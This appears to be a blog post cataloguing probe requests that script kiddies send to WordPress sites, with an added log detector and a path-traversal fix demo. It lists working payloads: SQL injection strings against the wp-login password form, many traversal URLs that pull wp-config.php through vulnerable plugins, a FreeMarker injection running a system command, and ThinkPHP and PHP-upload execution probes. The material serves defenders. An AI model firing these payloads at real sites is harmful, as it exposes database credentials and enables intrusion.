Script kiddies. How do you get a password with an Arbitrary File Download vulnerability?

One of the favourite script-kiddie techniques for "breaking security" is not so much breaking anything as typing a URL into the browser's address bar. Obtaining the credentials of the CMS (the database password stored in its configuration file) costs no more than appending a few characters after the site's normal address. If the site hosts an affected plugin, access to the administration is given away. The probe strings script kiddies use are therefore mostly a search in places where nothing is to be found: a plugin that has not been updated in several years is, presumably, hosted by only a fraction of sites.

A script kiddie, skiddie or skid is, in programming and hacking culture, a relatively unskilled individual who uses scripts or programs developed by others, such as a web shell, to attack computer systems and networks and to deface websites.

It is generally assumed that most script kiddies are juveniles who lack the ability to write sophisticated programs or exploits themselves and whose aim is to impress their friends or gain credit in computer-enthusiast communities. The term is not necessarily tied to the participant's actual age. Although it is considered derogatory, it does not automatically disparage anyone; there are places where calling someone a script kiddie is a compliment.

What do the young boys penetrate with?

In practice these are almost always automated requests for long-known vulnerabilities, or directly for bugs, backup files and out-of-date plugins. The overwhelming majority (the author puts it at 99%) of the bugs published on Packet Storm, Exploit-DB, WPScan and the like are vulnerabilities of the Authenticated Directory Traversal or Arbitrary File Download type.

SQL injection (not XSS) strings at the password form

The strings below are aimed at action=postpass, the WordPress wp-login.php handler for password-protected posts, and they are SQL injection probes rather than XSS: time-based payloads for MySQL (SLEEP), PostgreSQL (PG_SLEEP), MSSQL (WAITFOR DELAY) and Oracle (DBMS_PIPE.RECEIVE_MESSAGE), UNION ALL SELECT column enumeration with random marker strings, and ORDER BY column counting, i.e. the output of an automated scanner run against the form. A few unrelated probes are mixed in: a BlogVault dummyping request, a hex-encoded FreeMarker template-injection string in deviceUdid, and an upload test whose PHP payload multiplies two numbers so that the product appearing in the response reveals code execution.

php?action=postpass&post_password=1
php?action=postpass%3BSELECT%20PG_SLEEP%285%29--&post_password=1
php?action=postpass%27%29%3BSELECT%20PG_SLEEP%285%29--&post_password=1
php?pubkey=f7147105f08270ed388922e582a0ea17&bvTime=1649700574&bvVersion=0.1&bvMethod=dummyping&sha1=true&sig=eb2730da574fe82581c3141311711fe92e312364
php?action=postpass%27%3BSELECT%20PG_SLEEP%285%29--&post_password=1
php?action=-1459%20UNION%20ALL%20SELECT%20NULL%2C%27qbxkq%27%7C%7C%27YicTfdZvoA%27%7C%7C%27qpzqq%27--%20BVVY&post_password=1
php?action=-3222%20UNION%20ALL%20SELECT%20%27qbxkq%27%7C%7C%27IIktdiPLZI%27%7C%7C%27qpzqq%27%2CNULL--%20EtjN&post_password=1
php?action=-6942%20UNION%20ALL%20SELECT%20NULL%2C%27qbxkq%27%7C%7C%27ApaNzbwTMMFepOWTzpeRcRCcymbsguOjaYjSIhVE%27%7C%7C%27qpzqq%27--%20ZzYf&post_password=1
php?action=postpass%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&post_password=1
php?action=postpass%20UNION%20ALL%20SELECT%20%27qbxkq%27%7C%7C%27trUgQDPpBgDtiFpZuEyLTtWSnkqQEYmYoTAmyVba%27%7C%7C%27qpzqq%27%2C64--%20nAwy&post_password=1
php?action=postpass%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&post_password=1

php?action=postpass%20UNION%20ALL%20SELECT%2064%2C%27qbxkq%27%7C%7C%27geEszrJMbjjZFplzVPFmrGGTphFLwwHEahthdgDs%27%7C%7C%27qpzqq%27--%20QVxI&post_password=1
php?action=postpass%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&post_password=1
php?action=postpass%20UNION%20ALL%20SELECT%20%27qbxkq%27%7C%7C%27HAYCKGiYzD%27%7C%7C%27qpzqq%27%2C64--%20AdPO&post_password=1
php?action=postpass%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&post_password=1
php?action=postpass%20UNION%20ALL%20SELECT%2064%2C%27qbxkq%27%7C%7C%27GXMtHsAkwH%27%7C%7C%27qpzqq%27--%20PHmf&post_password=1
php?action=postpass%25%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&post_password=1
php?action=-4110%20UNION%20ALL%20SELECT%2064%2C%27qbxkq%27%7C%7C%27qGBjdcAaGCkOIdgLJkTOEoNLFtVQICWCIVeolVQE%27%7C%7C%27qpzqq%27--%20LmkG&post_password=1
php?action=postpass%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28111%29%7C%7CCHR%28115%29%7C%7CCHR%2886%29%2C5%29%20FROM%20DUAL--&post_password=1

php?action=-5975%20UNION%20ALL%20SELECT%20%27qbxkq%27%7C%7C%27pKEjrDJHDKbmGbMCUXmqMgssjfNCFIJImXPujyuM%27%7C%7C%27qpzqq%27%2C64--%20zNZx&post_password=1
php?action=postpass%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28111%29%7C%7CCHR%28115%29%7C%7CCHR%2886%29%2C5%29%20FROM%20DUAL--&post_password=1
php?action=-7774%20UNION%20ALL%20SELECT%2064%2C%27qbxkq%27%7C%7C%27NgXwRlEMBV%27%7C%7C%27qpzqq%27--%20Nifn&post_password=1
php?action=-3195%20UNION%20ALL%20SELECT%20%27qbxkq%27%7C%7C%27tFmYjfGKPx%27%7C%7C%27qpzqq%27%2C64--%20CvNh&post_password=1
php?action=postpass%27%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28112%29%7C%7CCHR%28111%29%7C%7CCHR%28115%29%7C%7CCHR%2886%29%2C5%29%20FROM%20DUAL--&post_password=1
?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d

php?action=postpass%27%29%20ORDER%20BY%201--%20yWRe&post_password=1
php?action=postpass%27%29%20UNION%20ALL%20SELECT%20NULL--%20hfjb&post_password=1
php?action=postpass%29%20AND%20SLEEP%285%29%20AND%20%287065%3D7065&post_password=1
php?action=postpass%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20gZmh&post_password=1
php?action=postpass%20AND%20SLEEP%285%29&post_password=1
php?action=postpass%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20TVag&post_password=1
php?action=postpass%27%29%20AND%20SLEEP%285%29%20AND%20%28%27AYDT%27%3D%27AYDT&post_password=1
php?action=postpass%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20ljlb&post_password=1

php?action=postpass%27%20AND%20SLEEP%285%29%20AND%20%27fakp%27%3D%27fakp&post_password=1
php?action=postpass%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20ZTdY&post_password=1
php?action=postpass%25%27%20AND%20SLEEP%285%29%20AND%20%27%25%27%3D%27&post_password=1
php?action=postpass%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20WoWn&post_password=1
php?action=postpass%20AND%20SLEEP%285%29--%20TuEq&post_password=1
php?action=postpass%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20ZCuL&post_password=1
php?action=postpass%29%20AND%208964%3D%28SELECT%208964%20FROM%20PG_SLEEP%285%29%29%20AND%20%284705%3D4705&post_password=1
php?pubkey=f7147105f08270ed388922e582a0ea17&bvTime=1643566113&bvVersion=0.1&bvMethod=dummyping&sha1=true&sig=f3d68f7f21aff8b29af33bf9b96ffcfaa39f715a
php?sfilename=on.php&sfilecontent=<%3F%3D409723%2A20%3B&supfiles=on.php

Plugin probes typical of script kiddies

Most of the strings below point a plugin parameter that is supposed to name a slide image, backup, export, font or language file at ../wp-config.php instead, percent-encoded (..%2F) or not, sometimes as an absolute dir=/ combined with item=wp-config.php; the rest probe for file-upload handlers and for PHP files that would only exist on an already-compromised site.

php?action=as_async_request_queue_runner&nonce=8b7c7800dd
php?sig=beima&domain=contentmarketingminds.com&shell_file=wp-login&file_name=/xxx.txt
php?action=as_async_request_queue_runner&nonce=3ebd1178
/wp-content/plugins/zedd/1.php
php?action=p3dlite_handle_upload
php?action=duplicator_download&file=..%2Fwp-config.php
php?action=duplicator_download&file=%2F..%2Fwp-config.php
php?action=duplicator_download&file=../wp-config.php
php?action=kbslider_show_image&img=../wp-config.php
php?/albums/&preview=elementary/a:<?=print(43543534534-567567567);?>

php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
php?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php
php?page=ELISQLREPORTS-settings&Download_SQL_Backup=..%2Fwp-config.php
php?page=all-in-one-video-gallery&tab=..%2Fwp-config.php
php?page=checkout_editor_settings&tcp_box_path=..%2Fwp-config.php
php?page=dmsguestbook&advanced=1&folder=language&file=..%2Fwp-config.php

php?page=miwoftp&option=com_miwoftp&action=download&item=..%2Fwp-config.php&order=name&srt=yes
php?page=newsletters-history&wpmlmethod=exportdownload&file=..%2Fwp-config.php
php?page=supsystic-backup&tab=bupLog&download=..%2Fwp-config.php
php?page=wp-db-backup.php&backup=..%2Fwp-config.php
php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php

php?action=handle_downloads&alg_wc_pif_download_file=../../../../../wp-config.php
php?page=supsystic-backup&tab=bupLog&download=/../wp-config.php
?post=application_id&action=edit&sjb_file=..%2Fwp-config.php
?page=wysija_campaigns&action=themes
?action=uploadFontIcon
?action=..%2Fwp-config.php
?action=ave_publishPost&title=random&short=1&term=1&thumb=..%2Fwp-config.php
?action=kbslider_show_image&img=..%2Fwp-config.php
?page=miwoftp&option=com_miwoftp&action=download&dir=%2F&item=wp-config.php&order=name&srt=yes

?page=miwoftp&option=com_miwoftp&action=download&item=..%2Fwp-config.php&order=name&srt=yes
?page=newsletters-history&wpmlmethod=exportdownload&file=..%2Fwp-config.php
?page=wp-db-backup.php&backup=..%2Fwp-config.php
?post_type=wd_ads_ads&export=export_csv&path=..%2Fwp-config.php
?page=backup_manager&download_backup_file=oldBackups%2F..%2F..%2Fwp-config.php
?page=backup_manager&download_backup_file=..%2Fwp-config.php
?page=ELISQLREPORTS-settings&Download_SQL_Backup=..%2Fwp-config.php
?alg_wc_pif_download_file=..%2F..%2F..%2F..%2F..%2Fwp-config.php
?action=getfile&/../wp-config.php
?page=supsystic-backup&tab=bupLog&download=..%2Fwp-config.php
/wp-content/plugins/wpeasystats/export.php?homep=../../../wp-config.php
/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=../../../../../wp-config.php
/wp-admin/admin-ajax.php?action=nf_fu_upload

/wp-includes/991176.php
/wp-content/plugins/masterx/ran.php
/wp-content/plugins/wp-json-api-disable/wwdv.php
/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings%5Bsource_file%5D=../../../wp-config.php
?page=ELISQLREPORTS-settings&Download_SQL_Backup=../wp-config.php
?action=revslider_show_image&img=../wp-config.php
?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
?action=kbslider_show_image&img=../wp-config.php
?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php
?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes
?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php
?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php

admin-ajax.php?action=woof_redraw_woof&shortcode=..%2Fwp-config.php
admin-ajax.php?jvfrm_spot_get_json&fn=..%2Fwp-config.php
admin-ajax.php?motor_load_more=..%2Fwp-config.php
post.php?post=application_id&action=edit&sjb_file=..%2Fwp-config.php
/JST10x.php?v36437=346548
/wp-coreutils.php?v36437=346548
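What a log-side check for the two lists above looks like, as an added example that is not code from the page or from any plugin: it parses Combined Log Format lines, URL-decodes every query key and value (twice, to catch %252F-style double encoding), and tags the traversal, wp-config.php, time-based and UNION SQL injection, and PHP-in-parameter upload patterns. The log lines are constructed; the IPs and the /wp-admin and /wp-login.php path prefixes are assumptions, since the page truncates the paths, while the query strings are taken from the lists.

```python
"""Log-side detection of the probe strings listed above (added example)."""
from __future__ import annotations

import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines in Combined Log Format. IPs and the /wp-admin
# and /wp-login.php path prefixes are assumptions (the page truncates the
# paths); the query strings are taken from the lists above.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2022:12:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120
203.0.113.5 - - [10/Apr/2022:12:00:02 +0000] "GET /wp-login.php?action=postpass%27%29%3BSELECT%20PG_SLEEP%285%29--&post_password=1 HTTP/1.1" 302 0
203.0.113.5 - - [10/Apr/2022:12:00:03 +0000] "GET /wp-login.php?action=postpass%20UNION%20ALL%20SELECT%2064%2C%27qbxkq%27%7C%7C%27GXMtHsAkwH%27%7C%7C%27qpzqq%27--%20PHmf&post_password=1 HTTP/1.1" 302 0
203.0.113.5 - - [10/Apr/2022:12:00:04 +0000] "GET /wp-admin/admin-ajax.php?sfilename=on.php&sfilecontent=<%3F%3D409723%2A20%3B&supfiles=on.php HTTP/1.1" 400 0
203.0.113.5 - - [10/Apr/2022:12:00:05 +0000] "GET /wp-admin/admin.php?page=backup_manager&download_backup_file=oldBackups%2F..%2F..%2Fwp-config.php HTTP/1.1" 404 0
198.51.100.7 - - [10/Apr/2022:12:00:06 +0000] "GET /wp-login.php?action=postpass&post_password=1 HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# A ".." path component anywhere in a decoded key or value.
TRAVERSAL_RE = re.compile(r'(^|/|\\)\.\.(/|\\|$)')
# Time-based SQL injection primitives for MySQL, PostgreSQL, Oracle and MSSQL,
# all four of which appear in the strings above.
SQLI_TIME_RE = re.compile(
    r'\b(SLEEP|PG_SLEEP|BENCHMARK|DBMS_PIPE\.RECEIVE_MESSAGE)\s*\(|\bWAITFOR\s+DELAY\b', re.I
)
# UNION-based column enumeration and ORDER BY column counting.
SQLI_UNION_RE = re.compile(r'\bUNION\s+ALL\s+SELECT\b|\bORDER\s+BY\s+\d+', re.I)
# A PHP open tag inside a parameter: an upload probe that checks for code
# execution by having the server evaluate an arithmetic expression.
PHP_TAG_RE = re.compile(r'<\?(php\b|=)', re.I)


def decode_param(raw: str) -> str:
    """parse_qsl has decoded once already; decode again for %252F-style double encoding."""
    return unquote(raw)


def classify(target: str) -> dict:
    """Return {"tags": set, "params": set} for one request target (path + query string)."""
    parts = urlsplit(target)
    tags: set[str] = set()
    params: set[str] = set()
    # Keys are inspected as well: "?action=getfile&/../wp-config.php" carries the path in a key.
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        for value in (decode_param(name), decode_param(raw)):
            hit = False
            if TRAVERSAL_RE.search(value):
                tags.add("traversal"); hit = True
            if "wp-config.php" in value.lower():
                tags.add("wp-config-target"); hit = True
            if SQLI_TIME_RE.search(value):
                tags.add("sqli-time"); hit = True
            if SQLI_UNION_RE.search(value):
                tags.add("sqli-union"); hit = True
            if PHP_TAG_RE.search(value):
                tags.add("php-upload"); hit = True
            if hit:
                params.add(name)
    return {"tags": tags, "params": params}


def scan(log_text: str) -> list[dict]:
    """Flag the lines whose request carries any probe pattern; benign lines are dropped."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        result = classify(m["target"])
        if result["tags"]:
            findings.append({
                "ip": m["ip"],
                "target": m["target"],
                "tags": sorted(result["tags"]),
                "params": sorted(result["params"]),
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], ",".join(f["tags"]), "via", ",".join(f["params"]), "->", f["target"][:80])
```

The random sqlmap-style marker strings (qbxkq…qpzqq) are deliberately not used as a signature: they change per scanner run, whereas the SQL primitives and the ".." segments do not. The legitimate postpass request in the last sample line produces no tags.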

Other probed functions and vulnerabilities

/phpunit/src/Util/PHP/eval-stdin.php
php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21
/?XDEBUG_SESSION_START=phpstorm
/mifs/.;/services/LogService
/Autodiscover/Autodiscover.xml
php?action=tcp_register_and_login_ajax
/?sfilename=on.php&sfilecontent=<%3F%3D409723%2A20%3B&supfiles=on.php
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
/s/34352e38382e3138382e3836/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties

Summary

By far the most frequently tested vulnerability is the Arbitrary File Download (unauthenticated download of an arbitrary file) found in the KenBurner Slider (kbslider) plugin in 2014 :)
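What such an arbitrary-file-download bug looks like, and the containment check that closes it, as an added example that is not code from the page or from any plugin. The directory layout, the stand-in wp-config.php contents and the probe strings are constructed; the vulnerable handler reproduces the ..%2Fwp-config.php and dir=/ + item=wp-config.php shapes from the lists above, and the hardened one resolves the path and refuses anything that ends up outside the backup directory.

```python
"""Arbitrary file download through a traversable download parameter (added example)."""
from __future__ import annotations

import os
import shutil
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Constructed stand-in for a real wp-config.php; the password is hypothetical.
CONFIG = b"<?php\ndefine('DB_PASSWORD', 'hunter2-example');\n"


def build_site() -> tuple[Path, Path]:
    """Throwaway WordPress-like tree: wp-config.php at the root and a backup
    directory three levels below it, the way a backup plugin would lay it out."""
    root = Path(tempfile.mkdtemp(prefix="wp-afd-"))
    (root / "wp-config.php").write_bytes(CONFIG)
    backups = root / "wp-content" / "uploads" / "backups"
    backups.mkdir(parents=True)
    (backups / "site-2022.zip").write_bytes(b"PK\x03\x04 constructed backup archive\n")
    return root, backups


def vulnerable_download(base_dir: Path, requested: str) -> bytes:
    """The bug behind the 'download=..%2Fwp-config.php' probes: the parameter is
    joined onto the backup directory with no containment check, so '..' walks out
    of it and an absolute path silently replaces it (os.path.join semantics)."""
    path = os.path.join(str(base_dir), unquote(requested))
    with open(path, "rb") as fh:
        return fh.read()


def safe_download(base_dir: Path, requested: str) -> bytes:
    """Hardened form: resolve the candidate (following symlinks) and require it to
    lie strictly inside base_dir; reject everything else before touching it."""
    base = base_dir.resolve()
    candidate = (base / unquote(requested)).resolve()
    try:
        relative = candidate.relative_to(base)
    except ValueError:
        raise PermissionError(f"{requested!r} resolves outside {base}") from None
    if relative == Path(".") or not candidate.is_file():
        raise FileNotFoundError(requested)
    return candidate.read_bytes()


def demo() -> dict:
    """Feed a legitimate name and two probe shapes from this page to both handlers.
    Returns {(handler, probe): outcome}; 'leaked-config' means wp-config.php came back."""
    root, backups = build_site()
    probes = {
        "legit": "site-2022.zip",
        "dotdot": "..%2F..%2F..%2Fwp-config.php",  # the '&file=..%2Fwp-config.php' form
        "absolute": str(root / "wp-config.php"),   # stand-in for 'dir=/&item=wp-config.php'
    }
    outcomes = {}
    try:
        for label, probe in probes.items():
            for name, handler in (("vulnerable", vulnerable_download), ("safe", safe_download)):
                try:
                    data = handler(backups, probe)
                    outcomes[(name, label)] = "leaked-config" if data == CONFIG else "served"
                except (PermissionError, FileNotFoundError) as exc:
                    outcomes[(name, label)] = type(exc).__name__
    finally:
        shutil.rmtree(root, ignore_errors=True)
    return outcomes


if __name__ == "__main__":
    for (handler, probe), outcome in sorted(demo().items()):
        print(f"{handler:10s} {probe:9s} -> {outcome}")
```

The check is done on the resolved path, not on the raw string: stripping ".." from the input is what many patched plugins tried first, and percent-encoding or a leading "/" gets around that, whereas a path that has been resolved either is under the backup directory or is not.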

Visualisation

(figure: Script kiddies XSS strings, password)
(figure: Script kiddies XSS strings)

Useful

Definition of script kiddie on Wikipedia.
The story "Jak penetrují mladí chlapci" (How the young boys penetrate) on phpfashion.cz.
Text: ISPConfig + Varnish cache.

ICTIS.CZ